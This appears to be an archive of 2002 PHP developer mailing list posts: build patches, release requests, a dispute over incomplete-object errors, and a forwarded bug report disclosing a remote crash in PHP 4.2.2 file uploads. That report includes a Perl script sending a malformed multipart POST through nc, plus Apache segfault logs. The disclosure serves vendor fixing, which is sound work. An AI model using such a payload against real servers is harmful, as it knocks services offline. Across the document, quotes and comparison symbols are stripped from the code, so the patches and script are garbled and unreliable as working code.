Re: [PHP-DEV] Newbie: ldap_connect() issue
Hello, this is the wrong list, user questions can be asked on the [EMAIL PROTECTED] mailinglist. (In this case you just didn't add ldap to the compile) Derick On Tue, 23 Jul 2002, Michael Gladden wrote: I am working with PHP 4.1.2 on Redhat 7.3 using the version of PHP that shipped with the O/S. In version 7.1 of Redhat, I simply installed the default version of Apache and PHP and everything worked fine. On 7.3, I am having trouble getting connected to a known working LDAP directory. The error that I am receiving is: Call to undefined function: ldap_connect() From the line: $ds = ldap_connect(myldapservername); I have tried a variety of versions of the above line including the port number. Can someone point me in the right direction to help resolve the issue? Thanks in Advance -- PHP Development Mailing List http://www.php.net/ To unsubscribe, visit: http://www.php.net/unsub.php --- Did I help you? http://www.derickrethans.nl/link.php?url=giftlist Frequent ranting: http://www.derickrethans.nl/ --- PHP: Scripting the Web - [EMAIL PROTECTED] All your branches are belong to me! SRM: Script Running Machine - www.vl-srm.net --- -- PHP Development Mailing List http://www.php.net/ To unsubscribe, visit: http://www.php.net/unsub.php
[PHP-DEV] OpenSSL patch
Reformatted to reflect codestyle.
--
Regards,
Arkadiusz Gralski: [EMAIL PROTECTED]
diff -uN --recursive php4/ext/openssl/openssl.c php4-new/ext/openssl/openssl.c
--- php4/ext/openssl/openssl.c Fri Jul 12 23:46:34 2002
+++ php4-new/ext/openssl/openssl.c Wed Jul 24 10:39:38 2002
@@ -15,6 +15,8 @@
| Authors: Stig Venaas [EMAIL PROTECTED]|
| Wez Furlong [EMAIL PROTECTED] |
| Sascha Kettler [EMAIL PROTECTED]|
+ | Additional Programming: |
+ | Norbert Mocek [EMAIL PROTECTED]|
+--+
*/
@@ -41,6 +43,10 @@
#include openssl/conf.h
#include openssl/rand.h
+#define FORMAT_UNDEF 0
+#define FORMAT_ASN1 1
+#define FORMAT_PEM 3
+#define FORMAT_SMIME 6
#define DEFAULT_KEY_LENGTH 512
#define MIN_KEY_LENGTH 384
@@ -88,8 +94,11 @@
PHP_FE(openssl_csr_export, arg2_force_ref)
PHP_FE(openssl_csr_export_to_file, NULL)
PHP_FE(openssl_csr_sign, NULL)
+PHP_FE(openssl_csr_parse, NULL)
+PHP_FE(openssl_csr_file_verify, NULL)
+PHP_FE(openssl_csr_verify,NULL)
+PHP_FE(openssl_csr_get_public,NULL)
-
PHP_FE(openssl_sign, arg2_force_ref)
PHP_FE(openssl_verify, NULL)
PHP_FE(openssl_seal, arg2and3_force_ref)
@@ -547,6 +556,9 @@
REGISTER_LONG_CONSTANT(PKCS7_NOATTR, PKCS7_NOATTR, CONST_CS|CONST_PERSISTENT);
REGISTER_LONG_CONSTANT(PKCS7_BINARY, PKCS7_BINARY, CONST_CS|CONST_PERSISTENT);
REGISTER_LONG_CONSTANT(PKCS7_NOSIGS, PKCS7_NOSIGS, CONST_CS|CONST_PERSISTENT);
+REGISTER_LONG_CONSTANT(FORMAT_PEM, FORMAT_PEM, CONST_CS|CONST_PERSISTENT);
+REGISTER_LONG_CONSTANT(FORMAT_SMIME, FORMAT_SMIME, CONST_CS|CONST_PERSISTENT);
+REGISTER_LONG_CONSTANT(FORMAT_DER, FORMAT_ASN1, CONST_CS|CONST_PERSISTENT);
REGISTER_LONG_CONSTANT(OPENSSL_PKCS1_PADDING,
RSA_PKCS1_PADDING,
@@ -1582,6 +1594,239 @@
}
/* }}} */
+/* {{{ proto bool openssl_csr_file_verify(string filename, long inform)
+ verifies the signature on the request in file*/
+PHP_FUNCTION(openssl_csr_file_verify)
+{
+ int x509=0;
+ BIO *in=NULL,*out=NULL;
+ EVP_PKEY *pkey=NULL;
+ int i, newreq=0;
+ int kludge=0;
+ int informat, verify=1, keyform=FORMAT_PEM;
+ char *infile;
+ long infile_len;
+ X509_REQ *req=NULL;
+
+ RETVAL_LONG(-1);
+
+ if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, sl, infile, infile_len, informat) == FAILURE) {
+ return;
+ }
+
+ in=BIO_new(BIO_s_file());
+ out=BIO_new(BIO_s_file());
+ if ((in == NULL) || (out == NULL)) {
+ goto end;
+ }
+
+ if (!newreq) {
+ /* Since we are using a pre-existing certificate
+ * request, the kludge 'format' info should not be
+ * changed. */
+ kludge= -1;
+ if (infile == NULL) {
+ BIO_set_fp(in, stdin, BIO_NOCLOSE);
+ } else {
+ if (BIO_read_filename(in, infile) = 0) {
+perror(infile);
+goto end;
+ }
+ }
+
+ if (informat == FORMAT_ASN1) {
+ req=d2i_X509_REQ_bio(in, NULL);
+ } else if (informat == FORMAT_PEM) {
+ req=PEM_read_bio_X509_REQ(in, NULL, NULL, NULL);
+ } else {
+ zend_error(E_WARNING, bad input format specified for X509 request\n);
+ RETVAL_LONG(-1);
+ goto end;
+ }
+
+ if (req == NULL) {
+ zend_error(E_WARNING, unable to load X509 request\n);
+ RETVAL_LONG(-1);
+ goto end;
+ }
+ }
+
+ if (verify !x509) {
+ int tmp=0;
+
+ if (pkey == NULL) {
+ pkey=X509_REQ_get_pubkey(req);
+ tmp=1;
+ if (pkey == NULL) {
+goto end;
+ }
+ }
+
+ i=X509_REQ_verify(req, pkey);
+ if (tmp) {
+ EVP_PKEY_free(pkey);
+ pkey=NULL;
+ }
+ if (i 0) {
+ goto end;
+ } else if (i == 0) {
+ zend_error(E_WARNING, verify failure\n);
+ RETVAL_LONG(-1);
+ } else {
+ RETVAL_TRUE;
+ }
+ }
+
+end:
+ EVP_PKEY_free(pkey);
+ X509_REQ_free(req);
+}
+/* }}} */
+
+/* {{{ proto bool openssl_csr_verify(mixed csr)
+ verifies the signature on the request*/
+PHP_FUNCTION(openssl_csr_verify)
+{
+ int x509=0;
+ zval * zcsr;
+ BIO *in=NULL,*out=NULL;
+ EVP_PKEY *pkey=NULL;
+ int i, newreq=0;
+ int kludge=0;
+ int informat, verify=1, keyform=FORMAT_PEM;
+ char *infile;
+ long infile_len;
+ X509_REQ *req=NULL;
+ long csr_resource = -1;
+ char *bio_mem_ptr;
+ long bio_mem_len;
+
+ RETVAL_LONG(-1);
+
+ if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, z, zcsr) == FAILURE) {
+ return;
+ }
+
+ req = php_openssl_csr_from_zval(zcsr, 0, csr_resource TSRMLS_CC);
+ if (req == NULL) {
+ zend_error(E_WARNING, cannot get CSR from parameter 1);
+ return;
+ }
+
+ if (verify !x509) {
+ int tmp=0;
+
+ if (pkey == NULL) {
+ pkey=X509_REQ_get_pubkey(req);
+ tmp=1;
+ if (pkey == NULL) {
+goto end;
+ }
+ }
+
+ i=X509_REQ_verify(req, pkey);
+ if (tmp) {
+ EVP_PKEY_free(pkey);
+ pkey=NULL;
+ }
+
+ if (i 0) {
+
[PHP-DEV] APACHE_VERSION
Hi.
With php-4.3.0-dev from CVS I allways get:
checking for Apache 2.0 module support via DSO through APXS... ./configure:
line 3107: syntax error near unexpected token `$APXS_HTTPD'
./configure: line 3107: ` PHP_AP_EXTRACT_VERSION($APXS_HTTPD)'
The attached patch reverts back to a state where this worked as in the older
php versions.
Thanks.
--
Regards // Oden Eriksson
Deserve-IT Networks - http://d-srv.com
--- configure 2002-07-24 10:44:20.0 +0200
+++ configure.oden 2002-07-24 10:47:31.0 +0200
-3104,7 +3104,7
done
# Test that we're trying to configure with apache 2.x
- PHP_AP_EXTRACT_VERSION($APXS_HTTPD)
+ APACHE_VERSION=`$APXS_HTTPD -v | head -1 | awk 'BEGIN { RS= ; } /Apache/ { print $1; }' | cut -f2 -d'/' | cut -f1 -d'-' | awk 'BEGIN { FS =.; } { printf %d, ($1 * 1000 + $2) * 1000 + $3;}'`
if test $APACHE_VERSION -le 200; then
{ echo configure: error: You have enabled Apache 2 support while your server is Apache 1.3. Please use the appropiate switch --with-apxs (without the 2) 12; exit 1; }
elif test $APACHE_VERSION -lt 240; then
--
PHP Development Mailing List http://www.php.net/
To unsubscribe, visit: http://www.php.net/unsub.php
[PHP-DEV] ext/imap
Hi.
With php-4.3.0-dev from CVS configure allways fails at:
checking whether SSL libraries are needed for c-client... /usr/lib
checking whether IMAP works... configure: error: build test failed. Please
check the config.log for details.
Reverting back to the old ext/imap/config.m4 fixes this as in the attached
patch.
Chears.
--
Regards // Oden Eriksson
Deserve-IT Networks - http://d-srv.com
--- ext/imap/config.m4.old 2002-07-24 10:56:04.0 +0200
+++ ext/imap/config.m4 2002-07-13 02:46:59.0 +0200
-1,5 +1,5
dnl
-dnl $Id: config.m4,v 1.44 2002/06/01 20:14:57 sr Exp $
+dnl $Id: config.m4,v 1.46 2002/07/12 22:11:54 sniper Exp $
dnl
AC_DEFUN(IMAP_INC_CHK,[if test -r $i$1/c-client.h; then
-21,6 +21,40
done
])
+dnl PHP_IMAP_TEST_BUILD(action-if-ok, action-if-not-ok [, extra-libs])
+AC_DEFUN(PHP_IMAP_TEST_BUILD, [
+ old_LIBS=$LIBS
+ LIBS=$3 $LIBS
+ AC_TRY_RUN([
+void mm_log(void){}
+void mm_dlog(void){}
+void mm_flags(void){}
+void mm_fatal(void){}
+void mm_critical(void){}
+void mm_nocritical(void){}
+void mm_notify(void){}
+void mm_login(void){}
+void mm_diskerror(void){}
+void mm_status(void){}
+void mm_lsub(void){}
+void mm_list(void){}
+void mm_exists(void){}
+void mm_searched(void){}
+void mm_expunged(void){}
+char mail_open();
+int main() {
+ mail_open(0,,0);
+ return 0;
+}
+ ], [
+LIBS=$old_LIBS
+$1
+ ],[
+LIBS=$old_LIBS
+$2
+ ])
+])
+
AC_DEFUN(PHP_IMAP_KRB_CHK, [
AC_ARG_WITH(kerberos,
[ --with-kerberos[=DIR] IMAP: Include Kerberos support. DIR is the Kerberos install dir.],[
-34,6 +68,12
fi
if test $PHP_KERBEROS != no; then
+if test ! -f $PHP_KERBEROS/lib/libkrb5.a test ! -f $PHP_KERBEROS/lib/libkrb5.$SHLIB_SUFFIX_NAME; then
+ AC_MSG_ERROR([Kerberos libraries not found in $PHP_KERBEROS/lib.
+
+ Check the path given to --with-kerberos (if no path is given, defaults to /usr/kerberos )
+ ])
+fi
AC_DEFINE(HAVE_IMAP_KRB,1,[ ])
PHP_ADD_LIBPATH($PHP_KERBEROS/lib, IMAP_SHARED_LIBADD)
PHP_ADD_LIBRARY(gssapi_krb5, 1, IMAP_SHARED_LIBADD)
-42,9 +82,10
PHP_ADD_LIBRARY(com_err, 1, IMAP_SHARED_LIBADD)
else
AC_EGREP_HEADER(auth_gss, $IMAP_INC_DIR/linkage.h, [
- AC_MSG_ERROR(This c-client library is build with Kerberos support.
+ AC_MSG_ERROR([This c-client library is build with Kerberos support.
- Add --with-kerberos=DIR to your configure line. Check config.log for details.)
+ Add --with-kerberos=DIR to your configure line. Check config.log for details.
+ ])
])
fi
-62,45 +103,29
PHP_IMAP_SSL=/usr
fi
+ AC_MSG_CHECKING([whether SSL libraries are needed for c-client])
+
if test $PHP_IMAP_SSL != no; then
+AC_MSG_RESULT([$PHP_IMAP_SSL/lib])
AC_DEFINE(HAVE_IMAP_SSL,1,[ ])
PHP_ADD_LIBPATH($PHP_IMAP_SSL/lib, IMAP_SHARED_LIBADD)
PHP_ADD_LIBRARY_DEFER(ssl,, IMAP_SHARED_LIBADD)
PHP_ADD_LIBRARY_DEFER(crypto,, IMAP_SHARED_LIBADD)
else
-old_LIBS=$LIBS
-LIBS=$LIBS -L$IMAP_LIBDIR -l$IMAP_LIB
+TST_LIBS=-L$IMAP_LIBDIR -l$IMAP_LIB
if test $PHP_KERBEROS != no; then
- LIBS=$LIBS -L$PHP_KERBEROS/lib -lgssapi_krb5 -lkrb5 -lk5crypto -lcom_err
+ TST_LIBS=$TST_LIBS -L$PHP_KERBEROS/lib -lgssapi_krb5 -lkrb5 -lk5crypto -lcom_err
fi
-AC_TRY_RUN([
- void mm_log(void){}
- void mm_dlog(void){}
- void mm_flags(void){}
- void mm_fatal(void){}
- void mm_critical(void){}
- void mm_nocritical(void){}
- void mm_notify(void){}
- void mm_login(void){}
- void mm_diskerror(void){}
- void mm_status(void){}
- void mm_lsub(void){}
- void mm_list(void){}
- void mm_exists(void){}
- void mm_searched(void){}
- void mm_expunged(void){}
- char mail_open();
- int main() {
-mail_open(0,,0);
-return 0;
- }
-],,[
- AC_MSG_ERROR(This c-client library is build with SSL support.
-
- Add --with-imap-ssl=DIR to your configure line. Check config.log for details.)
-])
-LIBS=$old_LIBS
+PHP_IMAP_TEST_BUILD([
+ AC_MSG_RESULT(no)
+], [
+ AC_MSG_RESULT(yes)
+ AC_MSG_ERROR([This c-client library is build with SSL support.
+
+ Add --with-imap-ssl=DIR to your configure line. Check config.log for details.
+ ])
+], $TST_LIBS)
fi
])
-166,4 +191,12
PHP_ADD_LIBRARY_DEFER($IMAP_LIB,, IMAP_SHARED_LIBADD)
PHP_IMAP_KRB_CHK
PHP_IMAP_SSL_CHK
+
+dnl Test the build in the end
+AC_MSG_CHECKING(whether IMAP works)
+PHP_IMAP_TEST_BUILD([
+ AC_MSG_RESULT(yes)
+], [
+ AC_MSG_ERROR([build test failed. Please check the config.log for details.])
+], $DLIBS)
fi
--
PHP Development Mailing List http://www.php.net/
To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP-DEV] Requests for 4.2.3
On Mon, 22 Jul 2002, Michael Sisolak wrote: I believe that the following three patches should be included in 4.2.3: - etc/com/conversion.c, version 1.46 to fix bug #14353 (http://cvs.php.net/co.php/php4/ext/com/conversion.c?r=1.46Horde=0c024469e11792fde7be2067c89cfa6d) This one was already merged. - main/sapi.c, version 1.130 to fix bug #16458 (http://cvs.php.net/co.php/php4/main/SAPI.c?r=1.130Horde=0c024469e11792fde7be2067c89cfa6d) Applied - ext/standard/head.c, version 1.56 to fix bug #16626(http://cvs.php.net/co.php/php4/ext/standard/head.c?r=1.56Horde=bf567e33a9e655539c840bf2453f8cfb) Applied. Thanks for submitting this! Derick --- Did I help you? http://www.derickrethans.nl/link.php?url=giftlist Frequent ranting: http://www.derickrethans.nl/ --- PHP: Scripting the Web - [EMAIL PROTECTED] All your branches are belong to me! SRM: Script Running Machine - www.vl-srm.net --- -- PHP Development Mailing List http://www.php.net/ To unsubscribe, visit: http://www.php.net/unsub.php
[PHP-DEV] Re: [PHP-CVS] cvs: php4 /ext/standard incomplete_class.cphp_incomplete_class.h type.c
On Wed, 24 Jul 2002, Yasuo Ohgaki wrote: yohgaki Wed Jul 24 05:55:11 2002 EDT Modified files: /php4/ext/standardincomplete_class.c php_incomplete_class.h type.c Log: is_object() returns FALSE if object is a incomplete object. Raise E_NOTICE, instead of E_ERROR, for setting/getting properties to/from a incomplete object. Please discuss this first, I objected to this, and I still think this is not a good idea to be able to set and get properties from half-baken objects. (And I'm not tired this time :) Derick --- Did I help you? http://www.derickrethans.nl/link.php?url=giftlist Frequent ranting: http://www.derickrethans.nl/ --- PHP: Scripting the Web - [EMAIL PROTECTED] All your branches are belong to me! SRM: Script Running Machine - www.vl-srm.net --- -- PHP Development Mailing List http://www.php.net/ To unsubscribe, visit: http://www.php.net/unsub.php
[PHP-DEV] Re: [PHP-CVS] cvs: php4 /ext/standard incomplete_class.c php_incomplete_class.htype.c
[EMAIL PROTECTED] wrote: On Wed, 24 Jul 2002, Yasuo Ohgaki wrote: yohgaki Wed Jul 24 05:55:11 2002 EDT Modified files: /php4/ext/standardincomplete_class.c php_incomplete_class.h type.c Log: is_object() returns FALSE if object is a incomplete object. Raise E_NOTICE, instead of E_ERROR, for setting/getting properties to/from a incomplete object. Please discuss this first, I objected to this, and I still think this is I thought we've finished since there is no reply within 24H from last post. not a good idea to be able to set and get properties from half-baken objects. (And I'm not tired this time :) Yes, it's not good thing to do, but it's perfectly worked with older versions w/o any warnings nor errors. Besides, PHP4 does not have property protection. Raising fatal error for accessing incomplete object property is too much. It _BREAKS_ scripting take advantage of PHP4's object behavior. I don't think breaking compatibility is not needed now. However, I'm not against to raise fatal error in PHP5. PHP5 breaks scripts in many ways. Why don't we save it for PHP5? It's not fun to rewrite scripts many times. Let's break them at once and rewrite at once. :) -- Yasuo Ohgaki -- PHP Development Mailing List http://www.php.net/ To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP-DEV] Re: [PHP-CVS] cvs: php4 /ext/standard incomplete_class.c php_incomplete_class.h type.c
At 14:20 24/07/2002, Yasuo Ohgaki wrote: I don't think breaking compatibility is not needed now. However, I'm not against to raise fatal error in PHP5. PHP5 breaks scripts in many ways. Why don't we save it for PHP5? Without paying attention to the specific issue, please snap out of this state of mind. PHP 5 will not be a wholesale compatibility breaking version. To the best of my knowledge, there are no significant compatibility breaking changes in PHP 5. Once the object model is finalized, we'll add a mode in which PHP 5 employs the same object model as v4, which means people should be able to run their PHP 4 scripts without any modifications, out of the box. We should strive to keep it like this as much as we can. Zeev -- PHP Development Mailing List http://www.php.net/ To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP-DEV] Re: [PHP-CVS] cvs: php4 /ext/standard incomplete_class.cphp_incomplete_class.h type.c
Zeev Suraski wrote: At 14:20 24/07/2002, Yasuo Ohgaki wrote: I don't think breaking compatibility is not needed now. However, I'm not against to raise fatal error in PHP5. PHP5 breaks scripts in many ways. Why don't we save it for PHP5? Without paying attention to the specific issue, please snap out of this state of mind. PHP 5 will not be a wholesale compatibility breaking version. To the best of my knowledge, there are no significant compatibility breaking changes in PHP 5. Once the object model is finalized, we'll add a mode in which PHP 5 employs the same object model as v4, which means people should be able to run their PHP 4 scripts without any modifications, out of the box. We should strive to keep it like this as much as we can. Most PHP4 scripts may be executed w/o modification to run under PHP5, IMO also. Anyway, I'm not against keeping comaptibility between PHP4 and PHP5, too. I'm againt too high warning level that terminates script execution w/o fatal reason now. Without my patch, PHP 4.3.0 will terminate scripts with E_ERROR when user access incomplete object property. It was working w/o any warnings up untill 4.2.x. My patch works the same for both PHP4 and PHP5. It raises E_NOTICE for property access, E_ERROR for method. Older code was raising E_ERROR... If many people think this BC is required, I'm not againt having this BC, too. All I have to do is cast object to array then use the array to access incomplete object's property. If I need to save it back, cast the array back to object. I'm not sure if this works or not, though. (If it doesn't, I'll stringly disagree with the BC) Any comments? -- Yasuo Ohgaki -- PHP Development Mailing List http://www.php.net/ To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP-DEV] Requests for 4.2.3
Hi, [EMAIL PROTECTED] wrote: - ext/standard/head.c, version 1.56 to fix bug #16626(http://cvs.php.net/co.php/php4/ext/standard/head.c?r=1.56Horde=bf567e33a9e655539c840bf2453f8cfb) Applied. The header() function is not working in php 4.2.x the same way it used to in 4.1.x. According to the bug report http://bugs.php.net/bug.php?id=16842 it is already solved in the CVS (patch http://cvs.php.net/co.php/php4/ext/standard/head.c?r=1.58Horde=bf567e33a9e655539c840bf2453f8cfb ???). I believe this problem breaks a lot of applications. Could you please include the correction in php 4.2.3? Regards, Bauer -- PHP Development Mailing List http://www.php.net/ To unsubscribe, visit: http://www.php.net/unsub.php
[PHP-DEV] Re: Bug #18547 Updated: Remote attacker can cause SIGSEGV (fwd)
-- Forwarded message --
Date: Wed, 24 Jul 2002 16:12:06 -0400 (EDT)
From: Dan Kalowsky [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Subject: Re: Bug #18547 Updated: Remote attacker can cause SIGSEGV
Please send it to [EMAIL PROTECTED]
(Okay, that's easy enough -- I posted this in the web form, but it
wrapped all to hell. Thanks for the email address, Mr. Kalowsky)
Hello. While working on an exploit for the multipart_buffer_headers() hole
that you just fixed, and I found another problem that you might want to
look into. It looks like a DoS only, but there might be a way to execute
arbitrary code and I just haven't found it yet. Credit for the find goes
to myself and members of the [0dd] 0-Day Digest.
Thanks,
Thomas Cannon
---
[root@spoon]# /usr/local/www/bin/apachectl start
/usr/local/www/bin/apachectl start: httpd started
[root@spoon]# telnet 0 80
Trying 0.0.0.0...
Connected to 0.
Escape character is '^]'.
HEAD / HTTP/1.0
HTTP/1.1 200 OK
Date: Wed, 24 Jul 2002 04:03:49 GMT
Server: Apache/1.3.26 (Unix) PHP/4.2.2
X-Powered-By: PHP/4.2.2
Connection: close
Content-Type: text/html
Connection closed by foreign host.
[root@spoon]# /usr/local/www/bin/httpd -l
Compiled-in modules:
http_core.c
mod_env.c
mod_log_config.c
mod_mime.c
mod_negotiation.c
mod_status.c
mod_include.c
mod_autoindex.c
mod_dir.c
mod_cgi.c
mod_asis.c
mod_imap.c
mod_actions.c
mod_userdir.c
mod_alias.c
mod_access.c
mod_auth.c
mod_setenvif.c
mod_php4.c
suexec: disabled; invalid wrapper /usr/local/www/bin/suexec
[root@spoon]#
/* change over to my remote machine, stereophonic */
[tcannon@stereophonic]$ ./header.pl | nc noops.org 80 [1]
90464
[tcannon@stereophonic]$ ./header.pl | nc noops.org 80 [2]
90466
[tcannon@stereophonic]$ ./header.pl | nc noops.org 80 [3]
90468
[tcannon@stereophonic]$ ./header.pl | nc noops.org 80 [4]
90470
[tcannon@stereophonic]$ ./header.pl | nc noops.org 80
[tcannon@stereophonic]$ more header.pl
#!/usr/bin/perl
headers();
sub headers {
print POST /vuln/upload.php HTTP/1.0\n;
print Referer: http://www.noops.org\n;;
print Connection: Keep-Alive\n;
print User-Agent: killer-loop.pl\n;
print Host: www.noops.org\n;
print Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
image/png, */*\n;
print Accept-Encoding: gzip\n;
print Accept-Language: en\n;
print Accept-Charset: iso-8859-1,*,utf-8\n;
print Content-type: multipart/form-data; boundary=xnyLAaB03X\n;
print Content-length: 246\n\n\n\n;
print --xnyLAaB03X\n;
print Content-Disposition: form-data; name=.A x 100;
}
/* then back to spoon, the webserver... The 'reviewer' script is a little
thing I whipped up to keep a note of where I last read the apache_log and
error_log from, and it also weeds out the code red and nimda background
noise -- you'd see this same output from 'tail' or a similar utility */
/* NOTE: 5 - 10 minutes need to pass to give apache time to segfault */
[root@spoon]# reviewer
noops.org - - [23/Jul/2002:21:03:49 -0700] HEAD / HTTP/1.0 200 0 - -
adsl-66-127-227-196.dsl.sntc01.pacbell.net - - [23/Jul/2002:21:10:15
-0700] POST /vuln/upload.php HTTP/1.0 200 - http://www.noops.org;
killer-loop.pl
adsl-66-127-227-196.dsl.sntc01.pacbell.net - - [23/Jul/2002:21:10:38
-0700] POST /vuln/upload.php HTTP/1.0 200 - http://www.noops.org;
killer-loop.pl
adsl-66-127-227-196.dsl.sntc01.pacbell.net - - [23/Jul/2002:21:10:38
-0700] POST /vuln/upload.php HTTP/1.0 200 - http://www.noops.org;
killer-loop.pl
adsl-66-127-227-196.dsl.sntc01.pacbell.net - - [23/Jul/2002:21:10:39
-0700] POST /vuln/upload.php HTTP/1.0 200 - http://www.noops.org;
killer-loop.pl
adsl-66-127-227-196.dsl.sntc01.pacbell.net - - [23/Jul/2002:21:10:39
-0700] POST /vuln/upload.php HTTP/1.0 200 - http://www.noops.org;
killer-loop.pl
Now it's the error log...
[Tue Jul 23 21:03:40 2002] [notice] Apache/1.3.26 (Unix) PHP/4.2.2
configured -- resuming normal operations
[Tue Jul 23 21:03:40 2002] [notice] Accept mutex: flock (Default: flock)
[Tue Jul 23 21:10:15 2002] [notice] child pid 31780 exit signal
Segmentation fault (11)
[Tue Jul 23 21:10:38 2002] [notice] child pid 31781 exit signal
Segmentation fault (11)
[Tue Jul 23 21:10:39 2002] [notice] child pid 31782 exit signal
Segmentation fault (11)
[Tue Jul 23 21:10:39 2002] [notice] child pid 31779 exit signal
Segmentation fault (11)
[Tue Jul 23 21:10:40 2002] [notice] child pid 31871 exit signal
Segmentation fault (11)
[root@spoon]# gdb /usr/local/www/bin/httpd 32839
GNU gdb 4.18
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you
are welcome to change it and/or distribute copies of it under certain
conditions.
Type show copying to see the conditions.
There is absolutely no warranty for GDB. Type show warranty for
details.
This GDB was configured as i386-unknown-freebsd...
/usr/local/www/conf/32839: No such file or directory.
Attaching to program: /usr/local/www/bin/httpd, process 32839
Re: [PHP-DEV] Re: [PHP-CVS] cvs: php4 /ext/standard incomplete_class.c
Yasuo Ohgaki wrote: this works or not, though. (If it doesn't, I'll stringly disagree with the BC) I'll strongly disagree, not stringly ;) -- Yasuo Ohgaki -- PHP Development Mailing List http://www.php.net/ To unsubscribe, visit: http://www.php.net/unsub.php
[PHP-DEV] php-bugs
How do I un-subscribe from the php-bugs mailing list? It's not on the http://www.php.net/mailing-lists.php page, and sending an email to the list directly fails. I know it used to be part of php-dev at one time, and I'm just wondering if it's possible to un-subscribe from it without also un-subscribing from php-dev. -- Blake Barnett (bdb) [EMAIL PROTECTED] Sr. Unix Administrator DevelopOnline.com office: 480-377-6816 Learning is a skill, you get better at it with practice. -- PHP Development Mailing List http://www.php.net/ To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP-DEV] php-bugs
Hi, On 24 Jul 2002, Blake Barnett wrote: Received: from pb1.pair.com (pb1.pair.com [216.92.131.4]) by server20.idg.nl (UCX VMS MAIL/2713-7.1/2713-7.1) with SMTP id XAA16802 for [EMAIL PROTECTED]; Wed, 24 Jul 2002 23:51:40 +0200 (CEST) Received: (qmail 17044 invoked by uid 1010); 24 Jul 2002 21:51:40 - Mailing-List: contact [EMAIL PROTECTED]; run by ezmlm Precedence: bulk list-help: mailto:[EMAIL PROTECTED] list-unsubscribe: mailto:[EMAIL PROTECTED] The same headers are in php bugs mailings: list-help: mailto:[EMAIL PROTECTED] list-unsubscribe: mailto:[EMAIL PROTECTED] list-post: mailto:[EMAIL PROTECTED] Met vriendelijke groeten / With kind regards, IDG.nl Melvyn Sopacua WebMaster -- PHP Development Mailing List http://www.php.net/ To unsubscribe, visit: http://www.php.net/unsub.php
[PHP-DEV] Re: [PHP-QA] PHP 4.2.3 release process
On Mon, 22 Jul 2002, Derick Rethans wrote: I think it's time to start the release process of PHP 4.2.3 in which a lot of bugs will be fixed that are in 4.2.1/4.2.2. What about the build system - especially BSD_MAKEFILE stuff. If we issue a warning like: ***WARNING*** PHP now defaults to using GNU make. It can be found on the contributed cd-rom If for some reason, you cannot use GNU make, run: ./build/bsd_makefile Maybe even comment on the MAKE env variable, I think it'll be OK. If no bug report comes in, we can safely take out all that stuff in 4.3, like has been done in HEAD. Met vriendelijke groeten / With kind regards, IDG.nl Melvyn Sopacua WebMaster -- PHP Development Mailing List http://www.php.net/ To unsubscribe, visit: http://www.php.net/unsub.php
[PHP-DEV] CVS Account Request: xbite
Translating PHP Manual in Slovene language -- PHP Development Mailing List http://www.php.net/ To unsubscribe, visit: http://www.php.net/unsub.php
[PHP-DEV] PHP_NEW_EXTENSION MFH to PHP_4_2_0?
Hi, while trying to fix the sysvsem issues, I tried to build the new config.m4, but it failed on some syntax error. Reverted to PHP_EXTENSION i.s.o. PHP_NEW_EXTENSION and it worked again. Which is to be used for the PHP_4_2_0 branch? Additionally it would be nice if: http://cvs.php.net/diff.php/php4/acinclude.m4?sbt=2r1=1.193r2=1.194ty=h And: http://cvs.php.net/diff.php/php4/configure.in?sbt=2r1=1.357r2=1.358ty=h could make it. Met vriendelijke groeten / With kind regards, IDG.nl Melvyn Sopacua Webmaster -- PHP Development Mailing List http://www.php.net/ To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP-DEV] Patch suggestions for PHP 4.2.3 (tokenizer)
This would be nice to get into 4.2.3 - at least the tokenizer would be usable in a release version :) http://cvs.php.net/diff.php/php4/ext/tokenizer/tokenizer.c?r1=1.8r2=1.9ty=hnum=10 for bug : http://bugs.php.net/bug.php?id=16939 regards alan
[PHP-DEV] bug 16037 help? zend/thread-safety problem
I've been investigating the source around this bug: http://bugs.php.net/bug.php?id=16037 ...and can't quite wrap my head around how to fix it. The implication of the bug is that for Apache 2.x platforms using threading (or Apache 1.3.x on windows, which uses threading), you'll probably get random parse errors if two threads compile the same script at once. The problem seems to be the non-thread-safe use of some variable that's used when interpolating variables in strings, but I'm much better at Java threading then the Zend TS...() macros so I can't figure out where it is. By rooting around cvs.php.net, I was able to see that Zeev was in zend_language_parser most recently putting in some thread-safety changes, but there is definitely still a problem. Does anyone have interest in working with me to fix this bug? I'm highly motivated to fix it, but I need help. I see a few options if someone has the time: 1) I could test a new build (I can reproduce the bug at will) 2) I could compile and test a new build (haven't built win32 before, but I have VC6, so I can give it a shot) 3) I can patch it if someone could help me with the control-flow and threading macros Or, perhaps there is simply a better way? Any and all help is appreciated - -Mike -- PHP Development Mailing List http://www.php.net/ To unsubscribe, visit: http://www.php.net/unsub.php
